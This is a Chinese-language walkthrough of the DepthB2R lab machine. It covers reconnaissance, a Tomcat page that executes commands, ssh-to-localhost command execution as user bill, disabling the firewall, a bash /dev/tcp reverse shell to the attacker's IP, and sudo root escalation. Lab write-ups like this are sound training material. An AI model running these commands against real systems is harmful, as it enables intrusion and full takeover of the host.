DepthB2R SSH远程代码执行

简介

point 8

DepthB2R

Difficulty Intermediate

rated by community HARD

 

实验环境

攻击者 Kali 192.168.45.168

受害者 IP 192.168.170.21  Linux

 

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.170.21

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

没看到ssh服务

 

FUZZ测试发现一个有用的页面

2024-04-24_21-35

 

2. 漏洞挖掘与利用

2024-04-24_21-36

 

ps aux

2024-04-24_21-38

发现是有ssh服务的 但是nmap没扫描出来

考虑是不是有FW

ls -l /etc

2024-04-24_21-39

确实有

 

https://cloud.tencent.com/developer/article/1594881

在这里可以学到 ssh命令后面是可以再加命令的

2024-04-24_21-40_1

 

2024-04-24_21-41

发现用户名

 

这样我们就可以ssh执行命令了

注意:ssh bill@localhost

不能是127.0.0.1或自己的ip

 

首先关闭FW

ssh bill@localhost sudo ufw disable

 

然后反弹shell

经过重复测试 只有关闭FW这一步才能进行

ssh bill@localhost bash -i >& /dev/tcp/192.168.45.168/443 0>&1

 

3. 权限提升

发现我们是sudo组

sudo sudo /bin/bash

2024-04-24_21-49

直接提权

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片